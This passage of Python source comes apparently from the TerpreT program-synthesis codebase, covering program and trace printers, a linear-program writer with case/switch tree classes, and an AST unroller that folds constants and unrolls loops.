def __init__(self, par_prob_bound, data, hypers):
super(CombinatorUntypedPrinter, self).__init__(par_prob_bound, data, hypers)
self.output_printer = UntypedOutputPrinter(self)
class CombinatorUntypedImmutablePrinter(CombinatorUntypedPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(CombinatorUntypedImmutablePrinter, self).__init__(par_prob_bound, data, hypers)
self.register_printer = UntypedImmutableRegisterPrinter(self)
class CombinatorUntypedMutablePrinter(CombinatorUntypedPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(CombinatorUntypedMutablePrinter, self).__init__(par_prob_bound, data, hypers)
self.register_printer = UntypedMutableRegisterPrinter(self)
self.extra_register_num = hypers['extraRegisterNum']
self.register_num = hypers['inputNum'] + hypers['extraRegisterNum']
class AssemblyLoopPrinter(CombinatorPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(AssemblyLoopPrinter, self).__init__(par_prob_bound, data, hypers)
self.loop_body_length = hypers['loopBodyLength']
self.register_num = hypers['inputNum'] + hypers['extraRegisterNum']
self.register_printer = UntypedMutableRegisterPrinter(self)
def print_program(self):
# Inputs:
for i in range(self.input_num):
print("r%i <- Input();" % i)
# Prefixes:
for i in range(self.prefix_length):
print(self.stmt_to_str("prefixInstructions%%s_%i" % i, "r%i" % (self.input_num + i)))
# Combinator:
closure_stmts = []
closure_reg_pp = self.data_printer.assembly_loop_register_dist_to_string(self.register_num)
for i in range(self.loop_body_length):
stmt_str = self.stmt_to_str("loopBodyInstructions%%s_%i" % i,
"c%i" % i,
closure_reg_pp)
closure_stmts.append(stmt_str)
comb = dist_to_str(self.data_printer.get_looptype(self.solution['loop']))
comb_args = self.data_printer.register_dist_to_string(self.solution["loopInputList1"])
if comb != "foreach":
comb_args += " " + self.data_printer.register_dist_to_string(self.solution["loopInputList2"])
comb_pp_args = (comb,
comb_args,
"\n ".join([""] + closure_stmts))
if self.loop_body_length > 0:
if comb == "foreach":
print("%s ele1 in %s:%s" % comb_pp_args)
else:
print("%s (ele1, ele2) in %s:%s" % comb_pp_args)
# Suffix:
for i in range(self.suffix_length):
print(self.stmt_to_str("suffixInstructions%%s_%i" % i,
"r%i" % (self.input_num + self.prefix_length + 1 + i)))
prog_return = "return r%i" % (self.register_num - 1)
print(prog_return)
class AssemblyLoopTypedPrinter(AssemblyLoopPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(AssemblyLoopTypedPrinter, self).__init__(par_prob_bound, data, hypers)
self.stack_printer = StackPrinter(self)
self.output_printer = TypedOutputPrinter(self)
class AssemblyLoopUntypedPrinter(AssemblyLoopPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(AssemblyLoopUntypedPrinter, self).__init__(par_prob_bound, data, hypers)
self.stack_printer = StackPrinter(self)
self.output_printer = UntypedOutputPrinter(self)
class AssemblyRegisterPrinter(object):
def __init__(self, prog_printer):
self.prog_printer = prog_printer
self.num_timesteps = prog_printer.hypers['numTimesteps']
self.num_registers = prog_printer.hypers['numRegisters']
def str_for_var(self, var, ex_id):
return dist_to_str(self.prog_printer.data_printer.get_value(get_for_ex(self.prog_printer.var_data[var], ex_id)))
def print_reg(self, reg_name_template, ex_id):
reg_name = re.sub(r'_(\d+)', r'[\1]', reg_name_template % '')
args = (reg_name,
self.str_for_var(reg_name_template % (''), ex_id))
print(" %s = %s" % args)
def run(self, ex_id):
for t in range(self.num_timesteps + 1):
template = "Step t = %d, instr ptr = %s"
args = (t, self.str_for_var("instrPtr_%i" % t, ex_id))
if isinstance(self.prog_printer, AssemblyFixedAllocPrinter):
template += ":"
else:
template += ", stack ptr = %s:"
args += self.str_for_var("stackPtr_%i" % t, ex_id)
print(template % args)
for r in range(self.num_registers):
self.print_reg("registers%%s_%i_%i" % (t, r), ex_id)
print("")
class AssemblyPrinter(ProgramPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(AssemblyPrinter, self).__init__(par_prob_bound, data, hypers)
self.num_regs = hypers['numRegisters']
self.num_timesteps = hypers['numTimesteps']
self.register_printer = AssemblyRegisterPrinter(self)
def stmt_to_str(self, stmt_id):
# Determine where the result is written to:
out_data = self.solution["outs_%i" % stmt_id]
stmt_str = "%2i: %s <- " % (stmt_id, self.data_printer.register_dist_to_string(out_data))
instr_dist = self.solution["instructions_%i" % stmt_id]
instr_str = dist_to_str(self.data_printer.get_asm_instruction(instr_dist))
arg_dists = [self.solution["arg1s_%i" % stmt_id],
self.solution["arg2s_%i" % stmt_id]]
instr_arity = 2
if instr_str in ["nil", "one"]:
instr_arity = 0
elif instr_str in ["inc", "dec", "cdr", "car", "noop", "return"]:
instr_arity = 1
elif instr_str in ["cons", "add", "eq", "gt", "and", "or"]:
instr_arity = 2
branch_addr_str = dist_to_str(self.data_printer.get_value(self.solution["branchAddr_%i" % stmt_id]))
if instr_str == "jz" or instr_str == "jnz":
stmt_str = "%2i: %s %s %s" % (stmt_id,
instr_str,
self.data_printer.register_dist_to_string(arg_dists[0]),
branch_addr_str)
elif instr_str == "return":
stmt_str = "%2i: %s %s" % (stmt_id,
instr_str,
self.data_printer.register_dist_to_string(arg_dists[0]))
else:
stmt_str += instr_str
for arg_idx in range(instr_arity):
stmt_str += " " + self.data_printer.register_dist_to_string(arg_dists[arg_idx])
if "jz" in instr_str or "jnz" in instr_str:
stmt_str += " " + branch_addr_str
print (stmt_str + ";")
def print_program(self):
# Inputs:
for i in range(self.input_num):
print("r%i <- Input();" % i)
# Program:
for i in range(self.hypers['programLen']):
self.stmt_to_str(i)
def print_trace(self, ex_id):
# Hyperparams:
print('Hyperparams:')
for (hpp, value) in self.hypers.iteritems():
print(' %s = %d' % (hpp, value))
print("")
#self.stack_printer.run(ex_id)
self.register_printer.run(ex_id)
#self.output_printer.run(ex_id)
class AssemblyFixedAllocPrinter(AssemblyPrinter):
def __init__(self, par_prob_bound, data, hypers):
super(AssemblyFixedAllocPrinter, self).__init__(par_prob_bound, data, hypers)
self.input_stack_size = hypers['inputStackSize']
self.stack_size = self.input_stack_size + self.num_timesteps + 1
self.output_printer = UntypedOutputPrinter(self)
def print_stack(self, ex_id):
print('Stack:')
for ptr in range(1, self.input_stack_size + 1):
args = (ptr,
self.str_for_var("inputStackCarVal_%i" % (ptr - 1), ex_id),
self.str_for_var("inputStackCdrVal_%i" % (ptr - 1), ex_id))
print(" stack[%i] = (Car %s, Cdr %s)" % args)
for ptr in range(self.input_stack_size + 1, self.input_stack_size + self.num_timesteps + 1):
args = (ptr,
self.str_for_var("stackCarValue_%i" % (ptr - self.input_stack_size - 1), ex_id),
self.str_for_var("stackCdrValue_%i" % (ptr - self.input_stack_size - 1), ex_id))
print(" stack[%i] = (Car %s, Cdr %s)" % args)
def print_trace(self, ex_id):
# Hyperparams:
print('Hyperparams:')
for (hpp, value) in self.hypers.iteritems():
print(' %s = %d' % (hpp, value))
print("")
self.print_stack(ex_id)
self.register_printer.run(ex_id)
self.output_printer.run(ex_id)
```
#### File: TerpreT/lib/ilp_utils.py
```python
import numpy as np
import re
import astunparse
import ast
import sys
import utils as u
import pdb
one_index_re = re.compile("[a-zA-Z0-9]+_(\d+)_<.+")
two_index_re = re.compile("[a-zA-Z0-9]+_(\d+)_(\d+)_<.+")
three_index_re = re.compile("[a-zA-Z0-9]+_(\d+)_(\d+)_(\d+)_<.+")
one_index_re2 = re.compile("[a-zA-Z0-9]+_(\d+)_?$")
two_index_re2 = re.compile("[a-zA-Z0-9]+_(\d+)_(\d+)_?$")
three_index_re2 = re.compile("[a-zA-Z0-9]+_(\d+)_(\d+)_(\d+)_?$")
shared_index_re2 = re.compile("\w+SH")
def index_dominates_old(index1, index2):
if index1 is None: return False
if index2 is None: return True
if len(index1) != len(index2):
return len(index1) < len(index2)
for i1, i2 in zip(index1, index2):
if i1 < i2: return True
elif i1 > i2: return False
return False
def index_dominates(index1, index2):
if index1 is None: return False
if index2 is None: return True
if len(index1) == 1 and len(index2) > 1: return True
if len(index2) == 1 and len(index1) > 1: return False
if len(index1) != len(index2):
return len(index1) < len(index2)
for i1, i2 in zip(index1, index2):
if i1 < i2: return True
elif i1 > i2: return False
return False
def index_dominates2(index1, index2):
return not index_dominates(index1, index2)
def compare_indices(index1, index2):
if index1 is None and index2 is None: return 0
if index1 is None: return 1 # None is the worst
if index2 is None: return -1 # None is the worst
# length 1 comes first
if len(index1) == 1 and len(index2) > 1: return -1
if len(index2) == 1 and len(index1) > 1: return 1
for j in xrange(np.minimum(len(index1), len(index2))):
i1 = index1[j]
i2 = index2[j]
if i1 < i2: return -1
elif i1 > i2: return 1
if len(index1) < len(index2): return -1
if len(index2) < len(index1): return 1
return 0
class LPWriter(object):
def __init__(self):
self.equalities = []
self.variables = []
self.objectives = []
self.messages = []
self.constants = []
self.global_constants = []
self.runtime_function_declarations = []
self.runtime_functions = []
self.n_equations = 0
self.include_waitbar = True
self.message_sizes = {}
def extract_indices(self, local_marginal):
for pattern in [one_index_re, two_index_re, three_index_re]:
m = pattern.match(local_marginal)
if m is not None:
return tuple([int(d) for d in m.groups()])
return None
def extract_indices2(self, init_local_marginal):
local_marginal = init_local_marginal.split("<")[0]
local_marginals = local_marginal.split(",")
result = []
for local_marginal in local_marginals:
m = shared_index_re2.match(local_marginal)
is_shared = (m is not None)
for pattern in [one_index_re2, two_index_re2, three_index_re2]:
m = pattern.match(local_marginal)
if m is not None:
# print local_marginal, m.groups()
if not is_shared:
result.append(tuple([int(d) for d in m.groups()]))
else:
result.append(tuple([int(d)-1000 for d in m.groups()]))
#if m is not None:
#pdb.set_trace()
# result[-1] = tuple([-1000+x for x in result[-1]])
#if len(local_marginals) > 1:
# print init_local_marginal, result
# pdb.set_trace()
return result
def dominant_index(self, indices):
result = None
for index in indices:
if index_dominates(index, result):
result = index
return result
def dominant_index2(self, indices):
result = None
for index in indices:
if index_dominates(index, result):
result = index
return result
def add_equality(self, entries, target, n_eq):
entry_strs = []
indices = []
for entry in entries:
coeff, local_marginal, sum_over = entry
entry_strs.append("%s, '%s', '%s'" % (coeff, local_marginal, sum_over))
# indices.append(self.extract_indices(local_marginal))
indices.extend(self.extract_indices2(local_marginal))
if False and len(entries) == 1:
index = (-1, ) # np.inf, np.inf, np.inf)
else:
index = self.dominant_index(indices)
arg1 = "[(%s)]" % ("),(".join(entry_strs))
arg2 = target
result = "LP.addEquality(%s, %s, '%s') # %s -> %s" % (arg1, arg2, str(indices), str(indices), str(index))
result += " # %s" % (str(index))
self.equalities.append((index, n_eq, result))
self.n_equations += n_eq
return result
def add_variable(self, local_marginal, var_sizes, var_kind='Var'):
indices = self.extract_indices2(local_marginal)
if indices is None:
index = None
else:
index = self.dominant_index(indices)
result = "LP.addVariable('%s', [%s], kind='%s', label='%s') # %s" % (local_marginal, var_sizes, var_kind,str(indices),str(indices))
self.variables.append((index, result))
return result
def add_objective(self, local_marginal, expression):
result = "LP.addObjective('%s', '%s')" % (local_marginal, expression)
self.objectives.append(result)
return result
def add_message(self, local_marginal, expression, message_name, decl_size, group):
result = "message_indices['%s'] = LP.addObjective('%s', '%s', local_vals=local_vals)" % (message_name, local_marginal, expression)
self.messages.append(result)
self.message_sizes[message_name] = (group, decl_size)
return result
def add_constant(self, name, value):
if name.startswith("const_"):
name = name[len("const_"):]
# Matlab needs constants defined in two places
self.constants.append("LP.const['%s'] = %s;" % (name, value))
self.global_constants.append("%s = %s;" % (name, value))
def add_runtime_function(self, rtf):
rtf.decorator_list = []
self.runtime_function_declarations.append(astunparse.unparse(rtf))
self.runtime_functions.append('LP.rt.%s = %s' % (rtf.name, rtf.name))
def dump_boilerplate_top(self, indent=0):
self.write("import numpy as np", indent=indent)
self.write("from lp2matrix import LPCompiler", indent=indent)
self.write("import sys", indent=indent)
self.write("import time", indent=indent)
def dump_message_sizes(self, indent=0):
self.write("def messageSizes(local_vals=None):", indent=indent)
indent += 1
self.write("result = [{}, {}, {}]", indent=indent)
for key, pair in self.message_sizes.iteritems():
group, size = pair
self.write("result[%s]['%s'] = %s" % (group, key, size), indent=indent)
self.write("return result", indent=indent)
self.write()
def dump_make_LP_def(self, indent=0):
self.write("def makeLP(local_vals=None):", indent=indent)
self.write("LP = LPCompiler()", indent=indent + 1)
self.write("def Copy(a): return a", indent = indent + 1)
self.write("LP.rt.Copy = Copy", indent = indent + 1)
def dump_boilerplate_bottom(self, indent=0):
self.write("if __name__ == '__main__':", indent=indent)
self.write('LP = makeLP()', indent=indent + 1)
self.write('LP.save_to_mat(sys.argv)', indent=indent + 1)
def zero_one_index_offset(self):
""" This should return 1 if we expect 1-indexing, 0 if we expect 0-indexing"""
return 0
def dump_section(self, section_label, section, indent=0):
self.write("# " + section_label, indent=indent)
print_waitbar = self.include_waitbar and len(section) > 30
if print_waitbar:
self.write('t=time.time()', indent=indent)
progress = 0
progress_tick = int(len(section) / 30)
for s in section:
progress += 1
if print_waitbar and progress % progress_tick == 0:
self.write('print \'\\r [{0:30s}] {1:.1f}%%\'.format(\'-\' * int(%g), %g / 30. * 100.),' % (progress/float(len(section)) * 30., progress/float(len(section)) * 30.), indent=indent)
self.write(s, indent=indent)
self.write()
if print_waitbar:
self.write('print \'\\r [{0:30s}] {1:.1f}%\'.format(\'-\' * int(30), 30 / 30. * 100.),', indent=indent)
self.write('print " time for %s:", time.time()-t,"s"' % section_label, indent=indent)
def sort_equalities(self):
# this pre-sorting makes sure that the order of equalities with degenerate indices is always the same
presorted = sorted(self.equalities)
#presorted = self.equalities
self.equalities = sorted(presorted, cmp=lambda x, y: compare_indices(x[0], y[0]))
new_equalities = []
num_equalities = 0
for eq in self.equalities:
new_equalities.append(eq[2])# + " n=%s" % num_equalities)
num_equalities += eq[1]
self.equalities = new_equalities
def sort_variables(self):
# this pre-sorting makes sure that the order of variables with degenerate indices is always the same
presorted = sorted(self.variables)
#presorted = self.variables
self.variables = sorted(presorted, cmp=lambda x, y: compare_indices(x[0], y[0]))
self.variables = [pair[1] for pair in self.variables]
def dump(self, f=None, indent=0):
if f is None:
f = sys.stdout
self.f = f
self.dump_boilerplate_top(indent=indent)
self.dump_section('Global Constants', self.global_constants, indent=indent)
self.dump_section('Runtime Functions', self.runtime_function_declarations, indent=indent)
#self.dump_message_sizes(indent=indent)
self.dump_make_LP_def(indent=indent)
self.write()
self.sort_equalities()
self.sort_variables()
indent += 1
self.dump_section('Constants', self.constants, indent=indent)
self.dump_section('Runtime Functions', self.runtime_functions, indent=indent)
self.dump_section('Declarations', self.variables, indent=indent)
self.dump_section('Equalities', self.equalities, indent=indent)
self.dump_section('Objectives', self.objectives, indent=indent)
#self.write("message_indices = {}", indent=indent)
#self.dump_section('Messages', self.messages, indent=indent)
#self.write("return LP, message_indices", indent=indent)
self.write("return LP", indent=indent)
self.write()
self.write()
indent -= 1
self.dump_boilerplate_bottom(indent=indent)
def dump_objective(self, f=None, indent=0):
if f is None:
f = sys.stdout
self.f = f
self.dump_boilerplate_top(indent=indent)
self.write("def makeObjective(LP, local_vals=None):", indent=indent)
indent += 1
self.write("LP.clearObjective()", indent=indent)
self.dump_section('Objectives', self.objectives, indent=indent)
self.write("message_indices = {}", indent=indent)
self.dump_section('Messages', self.messages, indent=indent)
self.write("return message_indices", indent=indent)
def write(self, data="", indent=0):
self.f.write(indent * " " + data + "\n")
class CaseNode(object):
def __init__(self, var_name, val):
self.var_name = var_name
self.val = val
self.switch_groups = []
self.parent_group = None
self.factors = []
self.declarations = []
self.constants = []
self.runtime_functions = []
self.unhandled = []
self.local_marginals = {}
def children(self):
return filter(lambda x: isinstance(x, CaseNode), self.body)
def set_body(self, body):
self.body = body
def add_switch_group(self, group):
self.switch_groups.append(group)
def add_declaration(self, decl):
self.declarations.append(decl)
def add_constant(self, const):
self.constants.append(const)
def add_runtime_function(self, rtf):
#rtf.decorations_list=[]
self.runtime_functions.append(rtf)
def is_observed(self, decl):
for factor in self.factors:
if factor.var_name == decl.name and factor.is_observation():
return True, factor.arg_names[0]
return False, None
def is_constant(self, decl):
for factor in self.factors:
if factor.var_name == decl.name and factor.is_constant():
return True, factor.arg_names[0]
return False, None
def add_factor(self, factor):
self.factors.append(factor)
def eval_constant(self, str_rep):
literal_value = None
try:
literal_value = int(str_rep)
except ValueError:
for const in self.constants:
if const.name == str_rep:
literal_value = const.value
# Didn't find in local scope. Go up a level.
if self.parent_group is not None and self.parent_group.parent_case is not None:
literal_value = self.parent_group.parent_case.eval_constant(str_rep)
assert literal_value is not None, "unable to eval constant " + str_rep
return literal_value
def resolve_variable(self, name):
for decl in self.declarations:
if decl.name == name:
return decl
# Didn't find in local scope. Go up a level.
if self.parent_group is None or self.parent_group.parent_case is None:
assert False, "Unable to resolve variable " + name
return self.parent_group.parent_case.resolve_variable(name)
def __repr__(self):
return "CaseNode[%s]" % (self.context_str())
def make_local_marginals(self, declarations):
for decl in declarations:
# name = "mu[%s]_%s" % (self.context_str(), decl.name)
name = self.to_local_marginal(decl)
self.local_marginals[decl.name] = name
return self.local_marginals
def to_local_marginal(self, declaration):
return "%s_<%s>" % (declaration.name, self.context_str())
def is_global_case(self):
return self.parent_group is None
def gate_value_local_marginal_and_value(self, val=None):
if val is None:
val = self.val
return "%s_<%s>" % (self.var_name, self.ancestor_context_str()), val
#return "mu[%s]_%s(%s)" % (self.ancestor_context_str(), self.var_name, self.val)
def get_local_marginal(self, var_name):
return self.local_marginals[var_name]
def idx(self):
if self.parent_group is None:
return "X"
else:
return self.parent_group.idx()
def ancestor_context_str(self):
if self.parent_group is None:
return ""
elif self.parent_group.parent_case is None:
return ""
else:
return self.parent_group.parent_case.context_str()
def context_str(self, val=None, eval=False):
if self.parent_group is None:
return ""
elif self.parent_group.parent_case is None:
return ""
else:
ancestry_context_str = self.ancestor_context_str()
if val is None:
val = self.val
cur_context_str = "%s=%s#%s" % (self.var_name, val, self.idx())
if ancestry_context_str is "":
return cur_context_str
else:
return "%s,%s" % (ancestry_context_str, cur_context_str)
def num_switch_groups(self):
return len(self.switch_groups)
class SwitchGroup(object):
def __init__(self, var_name, idx_val):
self.var_name = var_name
self.cases = {}
self.parent_case = None
self.idx_val = idx_val
def add_case(self, val, case):
case.parent_group = self
self.cases[val] = case
def set_parent_case(self, case_node):
self.parent_case = case_node
def idx(self):
if self.parent_case is None:
assert False
else:
return self.parent_case.idx() + "," + str(self.idx_val)
def ghost_local_marginal(self, var_name):
context_str = self.parent_case.context_str() + "," + self.var_name
return "%s_<%s=@#%s>" % (var_name, context_str, self.idx())
def __repr__(self):
return "SwitchGroup(%s#%s)" % (self.var_name, self.idx())
def validate(self):
switch_decl = self.parent_case.resolve_variable(self.var_name)
num_cases = self.parent_case.eval_constant(switch_decl.size)
cases_are_covered = np.zeros(num_cases, dtype=bool)
for case in self.cases:
case = self.parent_case.eval_constant(case)
assert case < num_cases, "switch case out of bounds %s: %s (size=%s)" % (self, case, num_cases)
cases_are_covered[case] = True
assert np.all(cases_are_covered), "not all cases covered for %s: %s" % (self, np.nonzero(1 - cases_are_covered))
class Declaration(object):
def __init__(self, assign_node, case_node):
self.parse(assign_node)
self.context = case_node
#self.is_observed, self.observed_value = case_node.is_observed(self)
#self.is_constant, self.constant_value = case_node.is_constant(self)
def __repr__(self):
return "Declaration(%s, %s, %s, %s)" % (self.name, self.kind, self.size,
self.context.context_str())
def parse(self, assign_node):
if len(assign_node.targets) > 1: return False
if u.is_constant_definition(assign_node):
return None
self.name = assign_node.targets[0].id
rhs = assign_node.value
if isinstance(rhs, ast.Call):
call_node = u.cast(rhs, ast.Call)
self.parse_call(call_node)
self.array_size = None
elif isinstance(rhs, ast.Subscript):
subscript_node = u.cast(rhs, ast.Subscript)
call_node = u.cast(subscript_node.value, ast.Call)
self.parse_call(call_node)
self.array_size = u.get_index(subscript_node)
def parse_call(self, call_node):
self.kind = call_node.func.id
self.size = u.name_or_number(call_node.args[0])
assert len(call_node.args) <= 1, "shouldn't have more than 1 arg to decl (how to define consts changed)"
class Constant(object):
def __init__(self, assign_node, case_node):
self.parse(assign_node)
self.context = case_node
def __repr__(self):
return "Constant(%s, %s, %s)" % (self.name, self.value,
self.context.context_str())
def parse(self, assign_node):
assert len(assign_node.targets) == 1
self.name = assign_node.targets[0].id
self.value = assign_node.value.n
```
#### File: TerpreT/lib/unroller.py
```python
from __future__ import print_function
import ast
import astunparse
import copy
import error
from error import check_type
import itertools
import sys
def eprint(*args, **kwargs):
print(*args, file=sys.stderr, **kwargs)
def flat_map(f, l):
r = []
for e in l:
er = f(e)
if isinstance(er, list):
r.extend(er)
else:
r.append(er)
return r
class PartialEvaluator(ast.NodeTransformer):
def visit_FunctionDef(self, node):
for decorator in node.decorator_list:
self.visit(decorator)
return node
def visit_BinOp(self, node):
node = self.generic_visit(node)
if isinstance(node.left, ast.Num) and isinstance(node.right, ast.Num):
value = eval(compile(ast.copy_location(ast.Expression(body=node), node), '', 'eval'))
return ast.copy_location(ast.Num(n=value), node)
else:
return node
def visit_BoolOp(self, node):
node = self.generic_visit(node)
allBoolLit = True
for value in node.values:
allBoolLit = allBoolLit and isinstance(value, ast.Name) and (value.id == "True" or value.id == "False")
if allBoolLit:
value = eval(compile(ast.copy_location(ast.Expression(body=node), node), '', 'eval'))
return ast.copy_location(ast.Name(id=value, ctx=ast.Load()), node)
else:
return node
def visit_Compare(self, node):
node = self.generic_visit(node)
allNum = isinstance(node.left, ast.Num)
for comparator in node.comparators:
allNum = allNum and isinstance(comparator, ast.Num)
if allNum:
value = eval(compile(ast.copy_location(ast.Expression(body=node), node), '', 'eval'))
lit = ast.copy_location(ast.Name(id=str(value), ctx=ast.Load()), node)
return ast.copy_location(lit, node)
else:
return node
def visit_If(self, node):
node.test = self.visit(node.test)
#Make sure to only recursively visit things that we are going to keep:
if isinstance(node.test, ast.Name):
if node.test.id == True or node.test.id == "True":
#Flatten lists:
res = []
for stmt in node.body:
new_stmt = self.visit(stmt)
if isinstance(new_stmt, list):
res.extend(new_stmt)
else:
res.append(new_stmt)
node.body = res
return node.body
elif node.test.id == False or node.test.id == "False":
#Flatten lists:
res = []
for stmt in node.orelse:
new_stmt = self.visit(stmt)
if isinstance(new_stmt, list):
res.extend(new_stmt)
else:
res.append(new_stmt)
node.orelse = res
return node.orelse
return self.generic_visit(node)
def eval_const_expressions(node):
return PartialEvaluator().visit(node)
def subs(root, **kwargs):
'''Substitute ast.Name nodes for numbers in root using the mapping in
kwargs. Returns a new copy of root.
'''
root = copy.deepcopy(root)
class Transformer(ast.NodeTransformer):
def visit_FunctionDef(self, node):
return node
def visit_Name(self, node):
if node.id in kwargs and not isinstance(node.ctx, ast.Store):
replacement = kwargs[node.id]
if isinstance(replacement, int):
return ast.copy_location(ast.Num(n=replacement), node)
else:
return copy.copy(replacement)
else:
return node
return Transformer().visit(root)
def update_variable_domains(variable_domains, node_list):
'''Updates variable_domains by inserting mappings from a variable name to the to the number of
elements in their data domain.
Program variables are created in assignments of the form
"{varName} = Var({size})" or "{varName} = Param({size})".
'''
for ch in node_list:
if isinstance(ch, ast.Assign) and len(ch.targets) == 1:
name = astunparse.unparse(ch.targets[0]).rstrip()
rhs = ch.value
if isinstance(rhs, ast.Call):
decl_name = rhs.func.id
args = rhs.args
elif isinstance(rhs, ast.Subscript) and isinstance(rhs.value, ast.Call):
decl_name = rhs.value.func.id
args = rhs.value.args
else:
continue
if decl_name not in ["Param", "Var", "Input", "Output"]:
continue
if len(args) > 1:
error.error('More than one size parameter in variable declaration of "%s".' % (name), ch)
size = args[0]
if isinstance(size, ast.Num):
if name in variable_domains and variable_domains[name] != size.n:
error.fatal_error("Trying to reset the domain of variable '%s' to '%i' (old value '%i')." % (name, size.n, variable_domains[name]), size)
variable_domains[name] = size.n
else:
error.fatal_error("Trying to declare variable '%s', but size parameters '%s' is not understood." % (name, astunparse.unparse(size).rstrip()), size)
def inline_assigns_and_unroll_fors_and_withs(root):
'''Substitute identifiers defined using ast.Assign nodes by their assigned values,
and unroll for/with statements at the same time.
These passes need to happen together, so that assignments that become constant through
unrolling are correctly propagated, and for/with statements are properly unrolled
when nested.
Returns a new copy of node.
'''
variable_domains = {}
def get_variable_domain(node):
# Look up the number of values to switch on.
if isinstance(node, ast.Name):
return variable_domains[node.id]
if isinstance(node, str):
return variable_domains[node]
if isinstance(node, ast.Subscript):
if node.value.id in variable_domains:
return variable_domains[node.value.id]
node_name = astunparse.unparse(node).rstrip()
if node_name in variable_domains:
return variable_domains[node_name]
error.fatal_error("No variable domain known for expression '%s', for which we want to unroll a for/with." % (astunparse.unparse(node).rstrip()), node)
class Transformer(ast.NodeTransformer):
def __init__(self, environment={}, inlinable_functions={}):
# While I think Python's scoping rules are an abomination unto
# Nuggan, they do come handy here -- we don't need to worry
# about things coming in and going out of scope...
self.__environment = environment
self.__inlinable_functions = copy.copy(inlinable_functions)
def visit_FunctionDef(self, node):
for decorator in node.decorator_list:
self.visit(decorator)
# Record inlinable functions, and do not visit them:
if len(node.decorator_list) == 1 and node.decorator_list[0].func.id == "Inline":
self.__inlinable_functions[node.name] = node
else:
# Spawn off sub-visitor initialised with current environment,
# but its own scope, and remove arguments:
subEnvironment = copy.copy(self.__environment)
for arg in node.args.args:
subEnvironment.pop(arg.id, None)
subVisitor = Transformer(subEnvironment, self.__inlinable_functions)
node = subVisitor.generic_visit(node)
return node
def visit_Expr(self, node):
node = self.generic_visit(node)
if isinstance(node.value, list):
return node.value
else:
return node
def visit_Call(self, node):
if isinstance(node.func, ast.Name):
function_name = node.func.id
if function_name in self.__inlinable_functions:
to_inline = self.__inlinable_functions[function_name]
fun_pars = to_inline.args.args
call_args = node.args
if len(fun_pars) != len(call_args):
error.error("Trying to inline function with mismatching argument and parameter numbers.", node)
instantiation = {}
for i in range(0, len(fun_pars)):
instantiation[fun_pars[i].id] = self.visit(call_args[i])
inlined_stmts = []
for stmt in to_inline.body:
instantiated_stmt = subs(stmt, **instantiation)
instantiated_stmt = self.visit(instantiated_stmt)
inlined_stmts.append(instantiated_stmt)
return inlined_stmts
return self.generic_visit(node)
def visit_Assign(self, assgn):
if len(assgn.targets) > 1:
raise Exception("Cannot process tuple assignment in %s" % assgn)
if not(isinstance(assgn.targets[0], ast.Name)):
assgn.targets[0] = eval_const_expressions(self.visit(assgn.targets[0]))
else:
assgn.targets[0] = eval_const_expressions(assgn.targets[0])
target = assgn.targets[0]
assgn.value = eval_const_expressions(self.visit(assgn.value))
if isinstance(target, ast.Name) and (isinstance(assgn.value, ast.Num) or
isinstance(assgn.value, ast.Name) or
(isinstance(assgn.value, ast.Subscript) and isinstance(assgn.value.value, ast.Name))):
self.__environment[target.id] = assgn.value
update_variable_domains(variable_domains, [assgn])
return assgn
def visit_Name(self, node):
if node.id in self.__environment:
return copy.deepcopy(self.__environment[node.id])
else:
return node
def visit_If(self, node):
node.test = self.visit(node.test)
node = eval_const_expressions(node)
if not(isinstance(node, ast.If)):
if isinstance(node, list):
return flat_map(self.visit, node)
else:
return self.visit(node)
# We want to unroll the "else: P" bit into something explicit for
# all the cases that haven't been checked explicitly yet.
def get_or_cases(test):
if not(isinstance(test, ast.BoolOp) and isinstance(test.op, ast.Or)):
return [test]
else:
return itertools.chain.from_iterable(get_or_cases(value) for value in test.values)
def get_name_and_const_from_test(test):
if not(isinstance(test.ops[0], ast.Eq)):
raise Exception("Tests in if can only use ==, not '%s'." % (astunparse.unparse(test.ops[0]).rstrip()), node)
(name, const) = (None, None)
if (isinstance(test.left, ast.Name) or isinstance(test.left, ast.Subscript)) and isinstance(test.comparators[0], ast.Num):
(name, const) = (test.left, test.comparators[0].n)
elif (isinstance(test.comparators[0], ast.Name) or isinstance(test.comparators[0], ast.Subscript)) and isinstance(test.left, ast.Num):
(name, const) = (test.comparators[0], test.left.n)
return (name, const)
checked_values = set()
checked_vars = set()
# Now walk the .orelse branches, visiting each body independently. Expand ors on the way:
last_if = None
current_if = node
while True:
# Recurse with visitor first:
current_if.test = eval_const_expressions(self.visit(current_if.test))
current_if.body = flat_map(self.visit, current_if.body)
# Now, unfold ors:
test_cases = list(get_or_cases(current_if.test))
if len(test_cases) > 1:
else_body = current_if.orelse
new_if_node = None
for test_case in reversed(test_cases):
body_copy = copy.deepcopy(current_if.body)
new_if_node = ast.copy_location(ast.If(test=test_case,
body=body_copy,
orelse=else_body),
node)
else_body = [new_if_node]
current_if = new_if_node
# Make the change stick:
if last_if is None:
node = current_if
else:
last_if.orelse = [current_if]
# Do our deed:
try:
(checked_var, checked_value) = get_name_and_const_from_test(current_if.test)
checked_vars.add(checked_var)
checked_values.add(checked_value)
# Look at the next elif:
if len(current_if.orelse) == 1 and isinstance(current_if.orelse[0], ast.If):
last_if = current_if
current_if = current_if.orelse[0]
else:
break
except:
# This may happen if we couldn't cleanly identify the else case. For this, just leave things as they are:
return node
# We need to stringify them, to not be confused by several instances refering to the same thing:
checked_var_strs = set(astunparse.unparse(var) for var in checked_vars)
if len(checked_var_strs) != 1:
raise Exception("If-else checking more than one variable (%s)." % (checked_var_strs))
checked_var = checked_vars.pop()
domain_to_check = set(range(get_variable_domain(checked_var)))
still_unchecked = domain_to_check - checked_values
else_body = flat_map(self.visit, current_if.orelse)
if len(else_body) == 0:
return node
# if len(still_unchecked) > 0:
# print("Else for values %s of %s:\n%s" % (still_unchecked, astunparse.unparse(checked_var).rstrip(), astunparse.unparse(else_body)))
for value in still_unchecked:
# print("Inserting case %s == %i in else unfolding." % (astunparse.unparse(checked_var).rstrip(), value))
var_node = copy.deepcopy(checked_var)
eq_node = ast.copy_location(ast.Eq(), node)
value_node = ast.copy_location(ast.Num(n=value), node)
test_node = ast.copy_location(ast.Compare(var_node, [eq_node], [value_node]), node)
case_body = copy.deepcopy(else_body)
new_if_node = ast.copy_location(ast.If(test=test_node, body=case_body, orelse=[]), node)
current_if.orelse = [new_if_node]
current_if = new_if_node
